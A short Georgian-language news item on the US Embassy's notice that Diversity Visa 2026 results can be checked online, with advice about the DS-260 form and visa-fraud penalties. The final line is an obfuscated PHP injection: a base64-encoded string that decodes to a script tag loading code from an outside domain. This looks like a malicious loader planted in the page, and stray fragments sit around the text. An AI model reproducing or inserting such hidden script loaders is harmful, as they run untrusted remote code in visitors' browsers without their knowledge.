gorgia
jaluzi

„მწვანე ბარათი 2026“ შედეგების გადამოწმება უკვე შესაძლებელია - ამის შესახებ ინფორმაციას საქართველოში აშშ-ის საელჩო facebook-ის გვერდზე აქვეყნებს, სადაც დაინტერესებული პირებისთვის ინსტრუქციაა მოცემული.

„იმის გადასამოწმებლად, შეირჩა თუ არა თქვენი კანდიდატურა, შეიყვანეთ თქვენი დასტურის ნომერი ამ ვებგვერდზე: dvprogram.state.gov/ESC/. ეს არის თქვენი სტატუსის გადამოწმების ერთადერთი გზა.

თუ dvprogram.state.gov/ESC/ ვებგვერდზე ნახავთ, რომ 2026 წლის პროგრამაში შეგარჩიეს, მიჰყევით იქ არსებულ ინსტრუქციას და შეავსეთ DS-260 ონლაინ აპლიკაცია. დაიმახსოვრეთ, შერჩევა არ იძლევა ინტერვიუსა ან ვიზის გარანტიას.

შეგახსენებთ: სავიზო თაღლითობას სერიოზული შედეგები მოჰყვება. ტყუილმა ან ყალბი დოკუმენტების წარდგენამ, შესაძლოა, გამოიწვიოს აშშ-ის საიმიგრაციო კანონმდებლობის შესაბამისად ვიზის უვადო აკრძალვა, რაც იმას ნიშნავს, რომ შეერთებულ შტატებში ვერასდროს შეძლებთ იმიგრირებას“, - აღნიშნულია საელჩოს განცხადებაში.

150
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");